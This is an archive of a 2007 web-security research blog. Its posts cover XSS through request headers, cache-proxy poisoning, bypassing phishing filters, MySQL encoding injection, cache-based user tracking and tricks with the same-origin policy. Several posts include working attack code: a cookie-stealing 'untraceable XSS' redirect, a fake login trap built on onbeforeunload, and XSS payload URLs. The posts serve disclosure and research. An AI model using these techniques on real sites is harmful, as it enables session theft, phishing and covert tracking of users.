Friday, October 12, 2007

Detecting Firefox Extensions Without Javascript

ascii recently posted a piece on detecting whether Javascript execution is disabled due to it being disabled through Firefox or through NoScript, by abusing NoScript's redirection code here:

Which got me thinking about how else we could determine this - and though I haven't come up with that, I've come up with a method to detect Firefox extensions without Javascript. It may not work on all extensions, but it works with NoScript, and should work with any extension which has a CSS file in chrome with a single valid definition.

If we take a look at how Firefox resolves conflicts between duplicate definitions for the same class (and probably for the same id) then we notice that Firefox simply uses the latter definition.

Knowing this we can construct a page which looks like this:

  .noscript-error {
    background-image: url(no.php)
  @import url(chrome://noscript/skin/browser.css);
  <div class="noscript-error">If noscript is NOT installed (and enabled as an extension) then Firefox will make a request for no.php, otherwise it won't.</div>

Whereby we simply have to have no.php set something in the session to say that the user does not have NoScript installed.

Note: Thanks to thornmaker for pointing out that no.php will also be requested by other browsers, so you probably want to do this only after you have determined the browser being used.

Also, ascii/sirdarckcat came up with another method for detecting when NoScript is installed, which does positive detection (i.e. youget a response when it is installed, rather than this negative detection), but I'll let them write about that.

Thursday, July 19, 2007

Firefox gets httpOnly!

I don't usually report on things here, but since no-one else seems to be saying something, I thought I should.

Anyway, Firefox has finally implemented httpOnly cookies, in, as you can see from their patch notes, and the following test case:

Note: If httpOnly cookies is implemented, the alert box should be blank, if it is not implemented you should see an alert which says hidden=value


header("Set-Cookie: hidden=value; httpOnly");


So hurrah for the Firefox developers who made this happen, no matter how long it took.

Wednesday, July 11, 2007

Exploiting reflected XSS vulnerabilities, where user input must come through HTTP Request Headers


1.0 Introduction
2.0 The User_Agent Header
3.0 (Known) Firefox & Safari Request Header Injection (Sometimes)
4.0 Attacking Caching Proxies
5.0 References

1.0 Introduction

Ever since Adobe patched Flash player to stop attackers spoofing certain headers[1] such as Referer, User-Agent, etc, it has been considered impossible to exploit XSS vulnerabilities where the user input is taken from a request header, e.g. when a website prints out what User-Agent a user's browser is sending, without escaping it. With the exception of the Referer header which we can control enough to exploit XSS attacks through it.

I want to showcase several ways in which we can still exploit these vulnerabilities.

2.0 The User_Agent header

If you look at how the User-Agent header is accessed in certain languages (namely PHP/Perl/Ruby/ColdFusion), you will see that the User-Agent header is not referenced as it is sent over the wire:





As you can see, all of these languages use an underscore(_) instead of a hyphen(-) when accessing the data, so if we use Flash to send a User_Agent header, like this:

class Attack {
  static function main(mc) {
    var req:LoadVars = new LoadVars();

    req.addRequestHeader("User_Agent", "<script>alert(1)</script>");
    req.send("http://localhost/XSS/server.php", "_self");

(Can be easily compiled with mtasc)

So if any of those languages mentioned above insecurely print the User-Agent header, or any header with a hyphen in it, then no matter whether it is blocked or not, it can still be injected.

The three other languages which I checked where ASP, ASP.NET and Java, and this is how the variables are accessed:



And while ASP/ASP.NET would seem to be vulnerable, it is a known fact to the MS developers[2] that headers with underscores cannot be accessed through the HTTP_ server variables, and so they have added more methods[2], which are not vulnerable.

Java does things neatly, and so it is not vulnerable.

Note: I made a mistake originally, and it seems that Perl apps are only vulnerable when testing through browsers other than IE.

Perl seems to use the last User_Agent or User-Agent header which you send it, and since the Flash plugin in IE appends our User_Agent header before IE's User-Agent header, Perl apps cannot be exploited when the user is Using IE.

3.0 (Known) Firefox & Safari Request Header Injection (Sometimes)

Stefano Di Paola published a paper[3], where he pointed out that IE7 and Firefox both facilitated request splitting when Digest authentication was used, Comcor also pointed out that Safari was vulnerable to the same issue.

IE7 was only vulnerable through the XMLHttpRequest object, which can only be invoked from the website which has Digest authentication, so it is useless to us in this case.

Furthermore request splitting is only useful when a user is behind a proxy (See Note at end of section), so if a user is not behind a proxy, then there is a point to spoofing headers rather than conducting a request splitting attack.

Anyway, what was not mentioned in the paper was that not only can the attack be invoked through an img tag, but it can also be invoked from an iframe tag, so here is a rather contrived PoC (based on Stefano's code):


  header('Set-Cookie: PHPSESSID=6555');

  if((int)intval($_COOKIE['PHPSESSID']) !== 6555){
    header('HTTP/1.0 401 Authorization Required');
    header('WWW-Authenticate: Digest realm="", qop="auth,auth-int", nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", opaque="5ccc069c403ebaf9f0171e9517f40e41"');
  } else {
    header("Set-Cookie: PHPSESSID=0");



  <iframe src="http://user%0aUser-Agent%3a%20%3Cscript%3Ealert%281%29%3C%2Fscript%3E%0aTest%3a%20:pp@localhost/XSS/digest.php"></iframe>

Note: Its not completely true that we can't do any request splitting without a proxy; we can still split requests and have a server with multiple vhosts interpret the second split response as a normal request for a vhost other than that which has the digest authentication. Thanks to Amit Klein for pointing this out.

4.0 Attacking Cache Proxies.

Warning: This attack is rather convoluted, and a bit impractical. *shrug*

With the advent of Anti-DNS Pinning being disclosed by Martin Johns[4] and improved on by Kanatoko Anvil[5][6][7], Kanatoko also found that Flash didn't Pin DNS[8], and who together found that Java's DNS record could be spoofed if used via LiveConnect[9].

This gives us an exceptionally powerful tool - an ability to create socket connections from a victim's computer.

So by utilising the low level socket abilities of Flash or Java we can create a socket connection to the user's caching proxy server if they have one. From there we can inject requests where we provide an XSS payload in the appropriate HTTP request header, which the proxy will sometimes cache, so when we redirect the user to that page they will be served the XSSed version.

This works because cache servers are often setup to cache html pages, and they are very sometimes setup so the only thing which is matches is the URL, rather than any headers or cookies.

Here is a step-by-step explanation:

1. First of all we need to know the IP address and port the users to access their proxy - sadly this part is rather browser specific.

On IE we can use Java[10][11] to detect the proxy settings in IE (I know nothing about Java, other than the fact that its possible, and there are known methods), or by using Javascript[11] in Firefox, by reading the Firefox settings network.proxy.http and network.proxy.http_port.

2. The next step is to open a socket to the proxy server, Anti-DNS Pinning attacks are already well documented in [4][5][6][7][8][9].

3. Send a request to the caching proxy with an XSS payload in the appropriate HTTP headers on the socket you have established.

4. Send the user to the cached page. This can be improved by using Flash to send a "Cache-Control: only-if-cached" header so that the proxy is more likely to serve the XSS-ed page.

Note: I don't have any code to test this, but from when I setup squid to cache html pages, creating a socket to the page and injecting into headers, then viewing the same page in the browser worked, and so I see no reason why this shouldn't. And I have personally seen live proxy servers setup to cache html pages, and where these attacks are possible, so while I'm not sure how common such setups are, they definitely exist.

5.0 References

[1] "Forging HTTP request headers with Flash", Amit Klein, July 2006

[2] "HOWTO: Retrieve Request Headers using ISAPI, ASP, and ASP.Net", David Wang, April 2006

[3] "IE 7 and Firefox Browsers Digest Authentication Request Splitting", Stafano Di Paolo, April 2007

[4] "(somewhat) breaking the same-origin policy by undermining dns-pinning", Martin Johns, August 2006

[5] "Stealing Information Using Anti-DNS Pinning : Online Demonstration", Kanatoko Anvil, December 2006

[6] "Re: DNS Spoofing/Pinning", Kanatoko Anvil, December 2006,4511,4539#msg-4539

[7] "Anti-DNS Pinning + Socket in FLASH", Kanatoko Anvil, February 2007

[8] "Re: DNS Spoofing/Pinning", Kanatoko Anvil, February 2007,4511#msg-6253

[9] "Using Java in anti DNS-pinning attacks (Firefox and Opera)", Martin Johns & Kanatoko Anvil, February 2007

[10] "How to detect Proxy Settings for Internet Connection"

[11] "RE: Auto-detecting proxy settings in a standalone Java app"

[12] "Read Firefox Settings (PoC)", Sergey Vzloman, May 2007

Saturday, June 30, 2007

Universal Phishing Filter Bypass

Well, I tried to do responsible disclosure, so I could at least claim I care about how secure users are (and get my name in some patch notes, :p), but according to Microsoft "The Internet Explorer phishing filter is not a security feature, so this is not something MSRC would track.", Mozilla haven't replied (email sent early Wednesday), and Opera haven't replied either (bug report added early Thursday), though I didn't give opera much time, I really don't think its a big issue because its not even on by default in Opera.

To better understand how the following idea can actually be utilised, and why it matters, you need to understand the point of the phishing filter. When a phishing site is first created and sent to users, the phishing filter does not know about it - the phishing filter is updated based on a blacklist of URLs which are manually entered.

The reason,the filter works is because while a phisher could encode the address to stop it being detected, or move the server, etc, etc, but all the emails they sent still have the same static blocked link. And this is the whole reason the filter works - all the emails have the same link which is blocked. This doesn't have to be the case, but I'll write something about that some other day.

To avoid this, one can do the following:

Send out phishing emails as one normally would, but instead of pointing to the actual phishing page, point to some central server, which can send your arbitrary response headers, or is under your complete control.

The page the user is sent to, actually redirects the user to an actual phishing page, either on the same server or another.

There is a loophole in the phishing filters where if a page is blocked, but instead of being loaded, it redirects the user, then the phishing warning is not displayed (the phishing warning seems to do checks after the page has been loaded, or at least the html code has).

What this means is that, the moment a phishing URL is added to the list, the phisher can easily just make it redirect elsewhere (or just encode it, and redirect to the encoded URL to bypass the filter), and viola, the link in the phishing email is now working again.

And considering all the filters do direct URL comparisons, and the redirects do not have to be static (i.e. you could use mod_rewrite to make random URLs show the same phishing page), the way current phishing filters are set up you could avoid the indefinitely.

If you want to confirm this, here are the steps I sent to MS/Mozilla/Opera on how to verify it:

1. Find a blocked URL.
- I got from phishtank

2. Point the hosts file entry for the domain to an IP.
- I pointed to

3. Create a directory/page on your server in the same place as the phishing page.
- I created /yahoo/index.php on my localhost

4. Confirm that your page is being blocked.
- I directed my browser to as usual, and it was blocked in all browsers

5. Clear the browser cache/restart the browser.
- IE and Firefox need a restart, Opera needs you to manually clear the cache

6. Edit the file to redirect to another file on the site which is not blocked.
- I created /yahoo/login.php and then used a Location redirect in index.php to redirect myself there:

header ("Location:");

7. Visit the original phishing page again.
- I directed my browser to as usual, and in both browsers, no message was shown to the user, and I was successfully redirected, even though the original page was a known phishing URL in both systems.

Note: The need to clear the cache/restart the browser would not impact an attack, because the redirecting page would never be filtered and cached in the first place, it is merely a symptom of checking that the URL is properly blocked. So if you can trust me that the URL is blocked, you can simply ignore step 4.

Wednesday, June 27, 2007

[My]SQL Injection Encoding Attacks

Early last year Chris Shiflett and Ilia Alshanetsky published some posts about how it is possible to conduct SQL Injection attacks against sites which escape user input, but either use an encoding unaware escaping function (e.g. addslashes()), or do not inform their escaping function about the issue.

I'm not going to re-hash their posts, so you should go read them now, if you haven't done so before.

But who actually does either of those things? Well, Google Code search reports approximately 54,300 results for applications using addslashes() and approximately 100 applications which have the words "SET CHARACTER SET" in their code.

Not particularly many of the latter, but the very first result is the rather popular phpMyAdmin project, so its not a completely unused query.

Anyway, since I hadn't seen any research on which character sets were vulnerable (and which characters to use), I wrote a small fuzzer to test all the character sets which MySQL supports (other than UCS-2), for several different encoding attacks, though only the ones described by Chris and Ilia yielded any results. Here are the character sets vulnerable, and the first character of the multi-byte sequence where \ is the second character:
  • big5, [A1-F9]

  • sjis, [81-9F], [E0-FC]

  • gbk, [81-FE]

  • cp932, [81-9F], [E0-FC]

I didn't successfully test ucs2 because ucs2 is a fixed width 2 byte character encoding, which will not execute queries passed in standard ascii, and so it would be impossible to get a webapp working if you set your connections to ucs2 but didn't convert all your queries, etc, so a configuration issue like that would be instantly noticed, and if you were using an encoding unaware function, then it would definitely be vulnerable, since all byte sequences are two bytes.

Anyway, if anyone is interested, I uploaded the fuzzer here: As you will notice, I ripped the code which Ilia used to illustrate the vulnerability for GBK, so the two pieces look very similar. Its also not very well written, but it worked and got the results for me.

Notes: Part 2 of the fuzzer is trying to see if its possible to have a double or single quote as the second character in a multi-byte sequence, and Part 3 is trying to see if its possible to use a quote as the first character.

Also, this is obviously MySQL specific, the reason for this is because (as far as I could find out) MySQL is the only RDBMS which allows you to set the connection encoding through a query, all the other require configuration changes, and while addslashes() issues are applicable to all RDBMS's, most applications these days use mysql_real_escape_string().

Saturday, June 02, 2007

Building Secure Single Sign On Systems and Google

After seeing several posts which spelled doom and gloom if there was ever found an XSS hole in any of Google's because they used a Single Sign On (SSO) System I started trying to think of a method in which secure sign on could be securely implemented, where all the SSO server side code is trusted, e.g. when you own all the websites, and here's what I came up with.

Idea 1: Remote Javascript

The first thing that came into my head was using Remote Javascript files, to give any SSO site (site specific of course), which the server side back-end could then use to query a database, to check that the specific token was valid for their site, and if it was, they would be issued another site specific login token, which would be placed in a user's cookie, and session management would resume as usual.

The problem with this is, of course, making sure that no other sites can retrieve this login token by including the same remote javascript in their page.

Of course, there are several things you could do to prevent this:

You could do referer checks. While we have seen methods to spoof or strip referers, there have been no methods to my knowledge to date which can do this when you're requesting script elements. You could technically spoof the header normally, and try to poison the cache, but as long as the appropriate cache headers are sent, then this should not be possible.

But this leaves any users who have referer stripping firewalls in danger, and this is unacceptable.

You could use CSRF style protections. But this faces the problem of what you can actually tie the token to. You could tie the token to the IP, but as long as Anti-DNS Pinning works, this can be attacked and broken, so this is not a valid solution. And Furthermore doing such checks would be rather expensive in terms of operations needing to be performed, since this is being done between separate servers/sites.

Which essentially means that while we can make this system secure for most people, there are some we would not secure, and it is therefore not viable.

Idea 2: Remote iframes

I kept thinking about other ways you could send data to a specific site only and (from my attempts to break SessionSafe) I remembered that we could use iframes.

If an iframe sets the property, the page which loaded the iframe cannot read that value, and even if they could it would be considered a browser bug and fixed. So to transfer data to our domain and our domain only we would do the following:

Write an iframe to the page which looked like this:
<iframe width="300" height="150" src=""></iframe>

And on the following would be done:

If the user is not logged in display a login form.

If the user is logged in then write the following javasript tot he page: = '';

Where was determined by a switch statement on the site variable, so that only a valid site could be redirected to, and so the SSO service knew which particular value to parse in auth variable.

The other mechanisms are the same as in Idea 1. Furthermore this protects you from Programmatic password theft, since the password is entered on a domain which has nothing other than a login form.

Google's Approach

After thinking of Idea 2, I realised that this is what google does; on most of their services anyway. The one service (at which I initially looked to find out how Google implemented SSO, *doh*) which doesn't use the exact same method as above is Gmail. What it turns out Gmail does (which I somehow missed) is, instead of using an iframes, they redirect to the equivalent of where the whole login page is displayed, and the form is submitted to that same domain.

So what does this mean?

I came to the same idea independently of Google (which to me says that there must be some merit to it, sine I didn't just see the idea and say; hey, this looks good), and it should in theory and practice be perfectly sound as long as a website cannot tell determine the URL to which the iframe/a page loaded in an iframe is being redirected to, and there are no XSS holes in the SSO domain.

So Google's SSO should be secure in the face of an XSS hole?

Well, no; Google messed up; they made their SSO domain; the same domain as their main site, which means it used used for more central purposes (central in terms of design, rather than importance). This is bad, because there should be nothing on the SSO domain other than SSO forms, because otherwise one may find XSS holes in the SSO domain, and that breaks the whole system (bar things like IP locks tying the sessions together, but with Anti-DNS Pinning, this can again be broken)

So what are you trying to say

What I'm trying to say is that all XSS holes which are not in (and yes, the www is important) will not break SSO, but any XSS hole which is in that domain, has the potential to.

Oh, and Google isn't completely hopeless when it comes to security - they just have many more developers working for them, and many more web facing projects than most organisations.

Saturday, May 19, 2007

Tracking users with Cache Data

There are several methods that browsers and web servers use to speed up browsing, so that less data needs to be transfered over the network, two of these methods are the ETag/If-None-Match and Last-Modified/If-Modified-Since headers. The premise is fairly simple for both.

With the ETag/If-None-Match headers, the server simply sends an ETag header for a resource the first time it is requested, and then sends the page - the next time the browser needs the same resource it sends an If-None-Match header, and sends the parameter the server returned in the ETag response header, as the parameter for the If-None-Match request header.

If the server responds with a 304 Not Modified status, and does not return a message body (it MUST NOT return a message body), then the ETag is preserved in the cache, and the browser will keep sending the same If-None-Match header until the cache is deleted, as long as it keeps getting 304 replies.

The system is identical, just with different header names for the Last-Modified/If-Modified-Since headers.

Sadly though, the ETag/if-None-Match headers are only supported by Firefox, whereas the Last-Modified/If-Modified-Since headers are supported in Firefox and IE - to my knowledge (through my testing) none of these headers are supported in Opera.

As such it would be better to use the Last-Modified/If-Modified-Since headers.

All you need to do now is embed a tracking image in each page, and send a unique date each time no If-Modified-Since header is sent, and a blank 304 response at all other times.

The biggest problem here though is that you do need a separate http request, and as such the only way to associate requests is per IP and time frame, e.g. any request made <=10 seconds before the request for a particular date/etag from, the same IP, is the same user. You could also try using the Referer header, but the odds of someone denying cookies, but sending Referers is very low, IMO.

You could also use Javascript instead of images, and then you would be able to link requests more easily, but it would require you make an additional request from that page with the URL in the query string and tracking id, or similar.

You would still need to use one of these techniques though, because you need to serve different pieces of javascript to different people, and have that piece of javascript cached as long as possible.

But even given this, this allows you a method to track users who deny cookies between browsing sessions - for tighter correlation during browsing sessions you could use Jeremiah Grossman's Basic Auth Tracking

P.S. This is stored with the other cache data, so this will only work as long as the image/resource is cached, and clearing the ache manually (or turning the cache off) will stop this technique.

Wednesday, May 16, 2007

Determining sites trusted by NoScript

With the (relatively) new XSS filter added to NoScript it has become possible to determine whether a site is trusted or untrusted by seeing if NoScript decides to take action - of course this is not 100% accurate, since all these features can be turned off, but if they are turned off then you can execute some attacks anyway.

Open Redirect

The easiest method to determine whether a site is trusted is to use an open redirect, because you have control over where a site is sending a user, and as such can use the following two pieces of code to check whether is trusted:

<iframe src=""></iframe>

if (strpos($_SERVER['QUERY_STRING'], "=") !== FALSE) {
print "Untrusted!";
} else {
print "Trusted!<br />\n";
print "For ID: ".$_SERVER['QUERY_STRING'];


The server generated id is not even actually necessary since you can just store the info in a PHP session, but it is possible to 'attack' people who even have cookies disabled.

Non-Open Redirects

Now, a much more difficult task is attacking non-open redirects. Two things which limit this are:
  • We cannot use Javascript to determine where you've been.

  • We cannot actually pass a parameter to where we will be redirected.

The solution to the first problem lies here:

The solution to the second problem is a bit trickier, and relies on the 'usual' implementation of these systems, rather than a versatile technique.

Most systems which perform closed redirection have URLs which look like:

Where the id value is first run through intval(), then put directly into an SQL statement.

Now, we can exploit this fact by sending people to a URL like this:

Whereby if the is trusted then we will not be redirected anywhere because the URL will be filtered to look like this:

And since the id does not begin with a digit, the value of the variable, once put through intval() is 0, and either no redirect, or a completely different redirect will be done.

If the site is untrusted though, then the URL will be unfiltered, and when the id is run through intval, it will evaluate to 123, and so the user will be redirected to the usual place.

Controlled Off-Site Resources

If you can control any off-site resources such as images which a site embeds, then simply putting an ID in one parameter, and <script> in another, will cause the referer to be different on Trusted and Untrusted sites.

Generic Method

The methods above though all rely on a webapp having some kind of specific web feature, and while they're interesting (and that is the reason I included them), a generic method will prove far more useful.

And this generic method is extremely simple; just use the non-javascript history hack to find out what exact URLs a person has been to.

If you send a user to:

And the history hack says the user has been to

Then the site is obviously trusted.


These techniques can be used to either gather data about the user ala the Master Recon Tool (Mr. T) or the Black Dragon Project, or more importantly aid an attacker in bypassing NoScript's filters by finding which sites are trusted, and then either using those sites as a means of propagation (i.e. Emailing/PM-ing a user a link), or by sending a user to a persistent or DOM Based XSS on one of those sites.

Final notes

Since we do not have Javascript we need to be a bit tricky on how to actually use the info. The cleanest method is if you have a persistent or DOM based XSS in another site, then instead of simply sending data back to your server to be analysed you can have the CSS only History hack render an iframe which loads an iframe from your server, which redirects the user to the persistent or DOM based XSS in the trusted site.

The other method is having a iframe which refreshes every 5 seconds, which sends a request to the server, and the server will then try to aggregate all the data its collected, and act on it.

Why would you want to do this rather than sending the user to every single persistent and DOM based XSS condition you have?

Beats me; I just thought this was interesting.....

Saturday, April 28, 2007

Creating sockets to sites which run Google Analytics javascript without Anti-DNS Pinning

This is a short post, but I thought this warranted its own post, so that the message is not lost.

One of the repercussions of this post: is that any site which references the document.location property (e.g. any site running Google Analytics javascript) can be referenced by any subdomain.

And top level domains do not have to have any relation to their subdomain, so a DNS setup where these resolutions occur: -> web server controlled by -> victim web server running Google Analytics (or other document.location referencing code)

Is possible. Now, since can communicate with [1] as par my last post it can easily just insert a java applet (or with Firefox, javascript which uses the Java libraries) into, which will be able to create sockets to the web server's IP.

Another way the DNS->IP resolution scheme of subdomains not needing to be related can be abused is by making resolve to the IP of a service like myspace, which has a "domain generalisation" scheme, which will set the document.domain property to the second level domain, and so will resolve to, and can then create sockets to

And while, at the present this is a fairly pointless attack since we can still use Anti-DNS Pinning attacks, those problems may be solved before this.

[1] Note that all these attacks will only work if the hosts accept wildcard hostnames, and so the google analytics code is returned even if the hostname is incorrect.

Friday, April 27, 2007

Breaking the same origin policy in an upwards direction (IE & Firefox Only)

To explain why this is meaningful, I'll first give a quick primer on the document.domain property:

The document.domain is by default set to the hostname which is used to access a site.

The document.domain property is not read-only. It can be truncated by however many levels you like, so a site on sub2.sub1.domain.tld could set the document.domain property to sub1.domain.tld or domain.tld or just tld[1]

To determine whether javascript is able to interact with another window the property is compared, if the property is identical then the two windows can communicate.

Finaly, there is an additional check whereby if the document.domain property has not been modified then a page where the property has been modified cannot communicate with it.

Firefox and IE do have this check, but it seems a bit more relaxed. If the upper level domain reads the document.location property this check is seemingly ignored.

Now, one might be tempted to shrug this off, but many tracking scripts, and Google Analytics tracking code references the document.location property, and so any site which runs the Google Analytics code is vulnerable to having lower level domains communicate with the unwittingly.

[1] The Firefox 3 nightly build does not allow anyone to set the property to tld, as per two patches from trev/Wladimir Palant:,10863

This isn't the post your looking for either

A few days ago prdelka post a blog post entitled "This isnt the post your looking for", you should read it, preferably before reading ny more of this post. He also deleted all his other blog postings, and removed all the papers and exploits, etc, which he had written from his server.

For a while security people have been saying that such legislation would be a bad idea because they, as well as anyone possibly malicious, could be prosecuted, but the law understands mitigating factors, and I doubt such a thing would happen.

What I am more interested in, is how many of the hobbyists which do a considerable part of the research into computer security will be affected. Will they, like prdelka, decide to take the cautious route, and remove all their writings, etc, from public view. Will they be driven more or less underground, where information is only shared among close friends, until it spreads to the hands of criminals, without surfacing to help IT security people. Or will they decide to ignore the laws will continue - only time will tell obviously, but does everyone think?

And if you're in Britain, how will this affect you?

Sunday, April 01, 2007

Untraceable XSS Attacks Version 2

I was thinking about the Adobe PDF UXSS issue that we encountered a few months ago, and remembered how much of a problem we had solving it because servers were not sent the URL fragments (the part after the #).

Now this got me thinking; the client can still read the portion of the URL after the # symbol.

So why not put the location of our logic after the URL fragment like so:

<meta http-equiv="refresh" content="0;<script>var source_loc = substr (document.location.lastIndexOf("#") + 1); var s = document.createElement ('script'); s.src=source_loc; document.body.appendChild(s);</script>#">

And then you just shove that in a iframe, or popup or whatever other technique you are using to make sure users don't notice they're being attacked, and you're done.

Looking at the actual exploit, you can see that what we end up doing is using a Reflected XSS hole to create a DOM Based XSS hole which is specifically untraceable.

And it seems like a much cleaner method than the last two posts to me.

Friday, March 30, 2007

(Non-Persistent) Untraceable XSS Attacks (IE & Opera version)

[EDIT]: Due to something I misunderstood ages ago this post is completely useless, so please see: Which has been re-written.

Sadly I have an appalling habit of assuming that the way Firefox does things is the way other browsers do things when it comes to Javascript, and I am constantly missing things because of it.

Anyway; what I only just remembered is that IE and opera treat and as separate domains, and even if we can interact with this is almost completely useless to us.

But the goal here is not to allow our domain to talk to another domain. Our goal here is to not have to send our attack logic to the vulnerable web app, where it will be logged by the server.

We can use the same basic concept as in the last post, but instead of having go.php redirect to something which calls our logic from the parent, we will need it to look more like this: (Copy and paste it into notepad because it goes off the side of the page)

<meta http-equiv="refresh" content="0;<script>document.location = ''+escape(document.cookie);</script>">

And then our attack page would have to look something more like this:
document.domain = 'com.';
function logic () {
    var loc = window.frames[0].document.location;
    var cookie = substr (loc.lastIndexOf("=") + 1);
<iframe src="go.php" />

I have not tested this, but it should be possible to simply extract the cookie from the domain as demonstrated above, then set the same cookie for but you will run into issues if there are authentication cookies for a subdomain, which you cannot extract, but for most scenarios this should still be workable.

(Non-Persistent) Untraceable XSS Attacks

[EDIT]: Sorry for taking so long to do this, but I've been really busy lately. Anyway, when doing my initial testing with document.domain stuff Firefox threw some errors when I tried to set the domain to just 'com' - I'm not sure why since this is allowed, and as such this post was needlessly confusing (since I thought you could only set it to 'com.'), and so I've rewritten it (keeping most of it intact), the old copy is still at the end, but its not really worth reading since its pretty much the same thing.

When most XSS attacks are conducted they simply inject all the attack logic right into the domain they are attacking, this of course gives out information such as servers where cookies are getting logged, or any other attack logic, because it has been sent to the server, and since it is generally sent via GET, which is see in all server logs. The only exception to this is when the attack logic is hosted on another site, and a script tag is injected. The problem with this is that it still reveals where the server with the attack logic was located, and if the admin reacts relatively quickly, then the attack logic can be captured from that server.

Sometimes this is unavoidable, as in the case of persistent XSS attacks, because they rely on having the attack logic located on the site so that users will be attacked with it, without having to go to another site.

But persistent XSS attacks are not the only ones we see, and as such I would like to propose a method that has been used for conducting attacks before, but hasn't (to my knowledge) been used to mask a trail.

It turns out you can set the document.domain property to just 'com' if you have a .com domain.

Now, we can use this idea to remove all our attack logic from the site we are attacking with our reflected XSS attacks, and then extract data at will.

The easiest way to implement something like this would be to have two pages on your own .com domain. One to actually interface with the site, and one to use a meta redirect to the reflected XSS hole, and therefore strip the referer header.

And so, by doing this the site which you are abusing should have no clue as to where the attack originated from, except that it came from a .com domain.

The actual html/javascript implementation can be done in several ways, but the easiest is something similar to this:

attack.php :
document.domain = 'com';
function logic () {
<iframe src="go.php" />

go.php :
<meta http-equiv="refresh" content="0;<script>document.domain='com';window.parent.logic();</script>">

In this we have the attack page with the logic on it, which sets the document.domain property when it is loaded, when the iframe gets redirected to the vulnerable page on the target, the target receives no idea what server redirected it there, it then sets the domain to .com and calls the logic() function from the parent window, which can then extract cookie data from the attacked domain.

Of course, if you run the same attack for long enough, or have a worm, then a client-side tracker could be implemented because, just as you can extract data from the target domain, they can extract data from your domain. Even given this limitations though it is a step that is unlikely to be taken by any admin, but should still be considered.

Furthermore this should not be put on any site which hosts an actual site because if another attacker found such an attack page on a live server since you have set up a system where any .com domain can break the cross domain boundary.

Old Post:

When most XSS attacks are conducted they simply inject all the attack logic right into the domain they are attacking, this of course gives out information such as servers where cookies are getting logged, or any other attack logic, because it has been sent to the server, and since it is generally sent via GET, which is see in all server logs. The only exception to this is when the attack logic is hosted on another site, and a script tag is injected. The problem with this is that it still reveals where the server with the attack logic was located, and if the admin reacts relatively quickly, then the attack logic can be captured from that server.

Sometimes this is unavoidable, as in the case of persistent XSS attacks, because they rely on having the attack logic located on the site so that users will be attacked with it, without having to go to another site.

But persistent XSS attacks are not the only ones we see, and as such I would like to propose a method that has been used for conducting attacks before, but hasn't (to my knowledge) been used to mask a trail.

As trev found out, it is possible for a site in the .com TLD to set their document.domain value to '.com.', and this allows it to share details with any site which also sets its document.domain value to '.com.'.

Now, we can use this idea to remove all our attack logic from the site we are attacking with our reflected XSS attacks, and then extract data at will.

The easiest way to implement something like this would be to have two pages on your own .com domain. One to actually interface with the site, and one to use a meta redirect to the reflected XSS hole, and therefore strip the referer header.

And so, by doing this the site which you are abusing should have no clue as to where the attack originated from, except that it came from a .com domain.

The actual html/javascript implementation can be done in several ways, but the easiest is something similar to this:

attack.php :
document.domain = 'com.';
function logic () {
<iframe src="go.php" />

go.php :
<meta http-equiv="refresh" content="0;<script>document.domain='com.';window.parent.logic();</script>">

In this we have the attack page with the logic on it, which sets the document.domain property when it is loaded, when the iframe gets redirected to the vulnerable page on the target, the target receives no idea what server redirected it there, it then sets the domain to .com. and calls the logic() function from the parent window, which can then extract cookie data from the attacked domain.

Of course, if you run the same attack for long enough, or have a worm, then a client-side tracker could be implemented because, just as you can extract data from the target domain, they can extract data from your domain. Even given this limitations though it is a step that is unlikely to be taken by any admin, but should still be considered.

Furthermore this should not be put on any site which hosts an actual site because if another attacker found such an attack page on a live server, then they could easily conduct attacks similar to the one against MySpace described in trev's post.

[EDIT]: Sorry guys; false alarm. This doesn't fully work against IE and Opera because they treat and as separate domains,and so store cookies separately. I have figured out a way to overcome this, which I've posted here: so that anyone who has already seen this post will hopefully notice the second one.

Monday, March 26, 2007

Partially stopping sites breaking out of frames in Mozilla

I've been looking for ways to stop sites breaking out of frames for a long time now, and haven't been able to find anything.

And I still haven't been able to get anything working the way I'd like it to, but since I don't have much time these days I thought I'd throw this out there to see if anyone could figure something out. What I'm trying here is to be able to execute XSS attacks within iframes against sites which break out of iframes at the top of each page, but sadly I'm having almost no real success.

Using the idea that I used to implement this;, it is possible to stop site breaking out of frames.

Using the following code:
function test(e) {
    window.setTimeout ("stop();", 1);


window.onbeforeunload = test;

<iframe src="" />

But while it is possible to stop from breaking out of an iframe, the moment we call the stop(); function, the iframe also stops loading. So any XSS attacks after the frame breaking code will not be executed.

So as you can see I haven't been able to figure anything out which will stop the top window being changed, but not stop the iframe being loaded. Hopefully someone else will have more luck.

Tuesday, March 20, 2007

Trapping Mozilla For Phishing

I was looking at the onbeforeunload event handler today in the hopes of finding a way to attack/implement Martin Johns' paper SessionSafe: Implementing XSS Immune Session Handling (there's also some discussion about the paper here:,7607), and while I didn't find anything useful there, I did find a way to entrap, and therefore conduct phishing attacks against more aware Mozilla users.

Before delving into an explanation, here's the code which I'll explain:

function test(e) {
window.setTimeout ("stop();", 1);
window.setTimeout ("var test = document.getElementById ('test'); = 'block';var test2 = document.getElementById ('test2'); = 'none';", 1);

window.onbeforeunload = test;

<div id="test2">Please go to</div>
<div style="display:none;" id="test">Please Enter your Login Details here:
<form action="">
Username: <input name="username">
Password: <input type="password" name="password">

Anyway; when using the onbeforeunload event handler it is still possible to access the window object, and therefore still possible to set time-outs.

In our time-outs, we can call the stop() function. When the stop(); function is called the location bar is not reset, and therefore will display the URL the user entered.

The next thing we would like to do would be to add some data to the page which makes it look like a phishing site. Sadly (or Luckily depending on your view point), when you call the document.write() function, the location bar is reset, and therefore we must use the DOM to make the existing page disappear, and add our new page.

Simple Enough.

One thing you should note though, is that there is a bug in Firefox where, if you enter, say, google, then press Ctrl+Enter, then go to another tab, and then return, the address bar will read "google" rather than "", but its not a very likely scenario, so should not be much cause for concern. And furthermore it is (to my knowledge) impossible to find out where the user is going, so I do not think there are many uses other than a phishing page like the example provided.

You also cannot force the user to programmatically go to a page, and stop that and have the URL changed. the URL is changed programmatically only when the browser successfully loads the page.

Oh, and AFAIK a slightly similar (in terms of effect, not implementation) vuln in IE is still unpatched:

P.S. This was tested on Firefox

Monday, February 26, 2007

stopgetpass.user.js - an interim solution

A couple of days ago I posted a method of breaking the RSCR Fix Mozilla implemented in Firefox. Today, I want to post an interim fix for the issue in the form of a Greasemonkey script:

for (i=0,c=document.forms.length;i<c;i++) {
    if (document.forms[i].method == 'get') {
        var password = false;
        for (l=0,k=document.forms[i].elements.length;l<k;l++) {
            if (document.forms[i].elements[l].type == 'password') {
                password = true;
        if (password == true) {
            document.forms[i].method = "post"

